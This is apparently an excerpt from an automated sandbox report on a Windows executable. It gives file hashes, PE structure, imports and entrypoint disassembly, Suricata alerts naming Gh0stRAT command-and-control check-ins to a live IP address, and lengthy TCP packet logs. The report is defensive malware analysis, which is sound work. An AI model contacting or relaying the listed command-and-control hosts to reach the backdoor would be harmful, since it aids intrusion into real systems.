                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                              Malicious:false
                                              Preview:..

                                              \Device\Mup\localhost\pipe\atsvc

                                              Download File
                                              Process:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              File Type:GLS_BINARY_LSB_FIRST
                                              Category:dropped
                                              Size (bytes):300
                                              Entropy (8bit):4.436705481812323
                                              Encrypted:false
                                              SSDEEP:3:ri9H5tH//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl/3lP92lbrisZ4mAUWKzn4:ri9HHTwPYtyjtOsV39YBPZaoi59H
                                              MD5:2810F447F8CD90B97FD51CCE5BBD148D
                                              SHA1:356D1C372F7A30EC3DE4443953E948A517FC92A9
                                              SHA-256:89926CEA5BE1372827F355110418CE17EF54ECDEC8979154B0A3DB5C6C5E5714
                                              SHA-512:8A8F93BFF7D58698FDDE4394A44C90C2B2F7C94D677A295A79BEE7C33ED3F8589582FF55327FE4942927BA21E827235D4A7628BA641C24C9A79AD81D226B9569
                                              Malicious:false
                                              Preview:..........<.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............3.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ..........2.5....>.

                                              Static File Info

                                              General

                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Entropy (8bit):0.08017653910042216
                                              TrID:
                                              • Win64 Executable GUI (202006/5) 92.65%
                                              • Win64 Executable (generic) (12005/4) 5.51%
                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                              • DOS Executable Generic (2002/1) 0.92%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:2b687482300.6345827638.08.exe
                                              File size:30'883'840 bytes
                                              MD5:934c8c307939cd29f7d1d434f1ad09ef
                                              SHA1:452e15ee56888ad6424a15efc523dfc8137516b0
                                              SHA256:3fdcdf14ff5cb781cda7b1920d229ee59b3684b1d9b1ef939d0549ae0f8815be
                                              SHA512:c20efecf3985c68ce13e4a0d55a8be54f8e0df3de98fd5eef69e733513ba70dbc33eded5fa645213baf5195c3ad0961486d1d171726736036032ae4cc9c694f1
                                              SSDEEP:3072:oz1SlI+SwI3HOOp1I2nb5ZuJrSyUQZYX+70ZUoo/YhHTZtgXbPx:Ikx1I3uOb5fYFAZUoo/UzgX
                                              TLSH:FC678D1BA3E434E9E0BA4635C9921A16A772B83157309B6F03B0564EDF336C1DD3AF25
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.0...c...c...c..0c...c..2c...c..3c...c.e.b...c.e.b...c.e.b...c.uBc...c.uRc...c...c4..c.d.b...c.d>c...c..Vc...c.d.b...cRich...

                                              File Icon

                                              Icon Hash:57171d4de7912e31

                                              Static PE Info

                                              General

                                              Entrypoint:0x140005590
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x140000000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66E5AF10 [Sat Sep 14 15:43:12 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:2
                                              File Version Major:5
                                              File Version Minor:2
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:2
                                              Import Hash:f61665c78859eaa1c3d43a70d740946a

                                              Entrypoint Preview

                                              Instruction
                                              dec eax
                                              sub esp, 28h
                                              call 00007FF9B8B3FF80h
                                              dec eax
                                              add esp, 28h
                                              jmp 00007FF9B8B3B62Fh
                                              int3
                                              int3
                                              inc eax
                                              push ebx
                                              dec eax
                                              sub esp, 20h
                                              dec eax
                                              mov ebx, ecx
                                              dec eax
                                              mov eax, edx
                                              dec eax
                                              lea ecx, dword ptr [0000AEC1h]
                                              dec eax
                                              mov dword ptr [ebx], ecx
                                              dec eax
                                              lea edx, dword ptr [ebx+08h]
                                              xor ecx, ecx
                                              dec eax
                                              mov dword ptr [edx], ecx
                                              dec eax
                                              mov dword ptr [edx+08h], ecx
                                              dec eax
                                              lea ecx, dword ptr [eax+08h]
                                              call 00007FF9B8B40799h
                                              dec eax
                                              lea eax, dword ptr [0000AED1h]
                                              dec eax
                                              mov dword ptr [ebx], eax
                                              dec eax
                                              mov eax, ebx
                                              dec eax
                                              add esp, 20h
                                              pop ebx
                                              ret
                                              int3
                                              dec eax
                                              and dword ptr [ecx+10h], 00000000h
                                              dec eax
                                              lea eax, dword ptr [0000AEC8h]
                                              dec eax
                                              mov dword ptr [ecx+08h], eax
                                              dec eax
                                              lea eax, dword ptr [0000AEADh]
                                              dec eax
                                              mov dword ptr [ecx], eax
                                              dec eax
                                              mov eax, ecx
                                              ret
                                              int3
                                              int3
                                              inc eax
                                              push ebx
                                              dec eax
                                              sub esp, 20h
                                              dec eax
                                              mov ebx, ecx
                                              dec eax
                                              mov eax, edx
                                              dec eax
                                              lea ecx, dword ptr [0000AE61h]
                                              dec eax
                                              mov dword ptr [ebx], ecx
                                              dec eax
                                              lea edx, dword ptr [ebx+08h]
                                              xor ecx, ecx
                                              dec eax
                                              mov dword ptr [edx], ecx
                                              dec eax
                                              mov dword ptr [edx+08h], ecx
                                              dec eax
                                              lea ecx, dword ptr [eax+08h]
                                              call 00007FF9B8B40739h
                                              dec eax
                                              lea eax, dword ptr [0000AE99h]
                                              dec eax
                                              mov dword ptr [ebx], eax
                                              dec eax
                                              mov eax, ebx
                                              dec eax
                                              add esp, 20h
                                              pop ebx
                                              ret
                                              int3
                                              dec eax
                                              and dword ptr [ecx+10h], 00000000h
                                              dec eax
                                              lea eax, dword ptr [0000AE90h]
                                              dec eax
                                              mov dword ptr [ecx+08h], eax
                                              dec eax
                                              lea eax, dword ptr [00000075h]

                                              Rich Headers

                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x191140x8c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d760000x26f0.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d750000xe58.pdata
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x17e000x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x17e200x100.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x100000x380.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000xe3c00xe40074c9f413e23c91457ada02b035828ec6False0.5602042214912281data6.360089498833491IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x100000x9c960x9e001b8182317a0d8e6cd95b38978641fbc6False0.4228144778481013data4.802779184711532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x1a0000x1d5ac800x1d58200794aff82a6a5298243f654707e6052adunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .pdata0x1d750000xe580x1000eb973d7d4e8ec7bd6e226dea768287a0False0.4375data4.484533884288873IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x1d760000x26f00x2800d4f254994b637ef2ef36a284dda0b85dFalse0.312109375data4.28882495799986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x1d766100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4032258064516129
                                              RT_ICON0x1d768f80x130Device independent bitmap graphic, 32 x 64 x 1, image size 128EnglishUnited States0.41776315789473684
                                              RT_ICON0x1d76a280xb0Device independent bitmap graphic, 32 x 32 x 1, image size 64EnglishUnited States0.45454545454545453
                                              RT_ICON0x1d76ad80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5472972972972973
                                              RT_ICON0x1d76c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3835740072202166
                                              RT_ICON0x1d774a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.5455202312138728
                                              RT_DIALOG0x1d77a700x784dataEnglishUnited States0.3186070686070686
                                              RT_DIALOG0x1d781f80x252dataEnglishUnited States0.5218855218855218
                                              RT_STRING0x1d784500x6adataEnglishUnited States0.6792452830188679
                                              RT_GROUP_ICON0x1d77a100x5adataEnglishUnited States0.7777777777777778
                                              RT_VERSION0x1d762e00x330dataEnglishUnited States0.4644607843137255
                                              RT_MANIFEST0x1d784c00x22bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminatorsEnglishUnited States0.5315315315315315

                                              Imports

                                              DLLImport
                                              VERSION.dllVerQueryValueA, GetFileVersionInfoA, GetFileVersionInfoSizeA
                                              KERNEL32.dllLoadLibraryA, GetProcAddress, FreeLibrary, lstrcatA, MultiByteToWideChar, lstrcpyA, WideCharToMultiByte, GlobalAlloc, GlobalFree, GlobalLock, LocalFree, FormatMessageA, GlobalUnlock, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetLastError, GetStringTypeW, GetFileType, SetStdHandle, LCMapStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, IsValidCodePage, GetModuleFileNameA, SetFilePointerEx, WriteConsoleW, CreateFileW, GetProcessHeap, RtlPcToFileHeader, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, RtlUnwindEx, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetStdHandle, WriteFile, GetCurrentProcess, ExitProcess, TerminateProcess, GetModuleHandleExW, GetACP, HeapAlloc, CloseHandle, HeapFree, FindClose, FindFirstFileExA, VirtualAlloc
                                              USER32.dllEnableWindow, GetDlgItem, LoadIconA, SendMessageA, MoveWindow, MessageBoxA, SendDlgItemMessageA, GetWindowRect, MessageBoxW, EndDialog, GetSystemMetrics, DialogBoxParamA, wsprintfA, GetWindowTextA, SetWindowTextA
                                              ole32.dllStringFromGUID2, CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitializeEx
                                              ADVAPI32.dllRegDeleteKeyA, RegOpenKeyExA, RegEnumKeyExA, RegQueryValueA, RegCloseKey

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2025-01-05T10:12:54.154885+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.6627888.217.47.1698917TCP
                                              2025-01-05T10:12:56.382472+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.6627898.217.47.1698917TCP
                                              2025-01-05T10:12:59.159232+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.6627908.217.47.1698917TCP
                                              2025-01-05T10:13:16.082102+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.6627968.217.47.1698917TCP
                                              2025-01-05T10:13:18.989525+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.6627978.217.47.1698917TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 5, 2025 10:11:06.451349020 CET6264053192.168.2.6162.159.36.2
                                              Jan 5, 2025 10:11:06.456192970 CET5362640162.159.36.2192.168.2.6
                                              Jan 5, 2025 10:11:06.456377983 CET6264053192.168.2.6162.159.36.2
                                              Jan 5, 2025 10:11:06.461307049 CET5362640162.159.36.2192.168.2.6
                                              Jan 5, 2025 10:11:06.910214901 CET6264053192.168.2.6162.159.36.2
                                              Jan 5, 2025 10:11:06.915297985 CET5362640162.159.36.2192.168.2.6
                                              Jan 5, 2025 10:11:06.915363073 CET6264053192.168.2.6162.159.36.2
                                              Jan 5, 2025 10:11:19.997628927 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:19.997648954 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:19.997750998 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:20.013128996 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:20.013144016 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.324529886 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.324629068 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.325287104 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.325544119 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.380542040 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.380548954 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.380814075 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.380871058 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.383354902 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.431330919 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.742856026 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.742922068 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.742938995 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.743066072 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.748908043 CET62735443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.748927116 CET4436273539.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.891222000 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.891241074 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:21.891326904 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.891575098 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:21.891587019 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.214683056 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.215507030 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.215965033 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.215975046 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.216151953 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.216160059 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.568893909 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.568917036 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.568999052 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.569015980 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.569056988 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.569211006 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.569255114 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.569993019 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.570031881 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.570056915 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.570065022 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.570089102 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.570107937 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.655627966 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.655668020 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.655693054 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.655714035 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.655729055 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.655746937 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.656410933 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.656436920 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.656460047 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.656467915 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.656492949 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.656507015 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.657226086 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.657280922 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.657946110 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.657999992 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.658314943 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.658365011 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.658917904 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.658945084 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.658966064 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.658972979 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.658982992 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.659009933 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.742386103 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.742464066 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.742517948 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.742569923 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.742676020 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.742721081 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.742803097 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.742856979 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.742858887 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.742868900 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.742902040 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743289948 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743330956 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743340969 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743350029 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743364096 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743372917 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743386984 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743393898 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743411064 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743441105 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743757010 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743805885 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743885994 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743930101 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743937016 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743947029 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743963957 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.743966103 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743985891 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.743993044 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.744013071 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.744039059 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.744535923 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.744573116 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.744590998 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.744596958 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.744611979 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.744621992 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.744630098 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.744633913 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.744657993 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.744663954 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.744678974 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.744682074 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.744719028 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.744728088 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.829237938 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.829278946 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.829328060 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.829344034 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.829380989 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.829478025 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.829530001 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.829699993 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.829754114 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.829761028 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.829777956 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.829794884 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.829826117 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.847084045 CET62749443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.847105026 CET4436274939.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.870385885 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.870424986 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:23.870497942 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.870695114 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:23.870708942 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.170664072 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.173551083 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.173979998 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.173989058 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.174189091 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.174194098 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.515902042 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.515922070 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.515963078 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.515990019 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.516052008 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.516066074 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.516091108 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.516124010 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.799988985 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800030947 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800045967 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.800054073 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800066948 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800079107 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.800101042 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.800107002 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800118923 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800122976 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.800172091 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.800172091 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800184965 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800204039 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.800215960 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.800216913 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800228119 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800257921 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800260067 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:25.800266981 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:25.800302982 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.022313118 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.022356033 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.022433996 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.022452116 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.022464037 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.022490025 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.022810936 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.022864103 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.023576975 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.023608923 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.023639917 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.023648977 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.023659945 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.023686886 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.024405956 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.024462938 CET62762443192.168.2.639.103.20.34
                                              Jan 5, 2025 10:11:26.025382042 CET4436276239.103.20.34192.168.2.6
                                              Jan 5, 2025 10:11:26.025415897 CET4436276239.103.20.34192.168.2.6
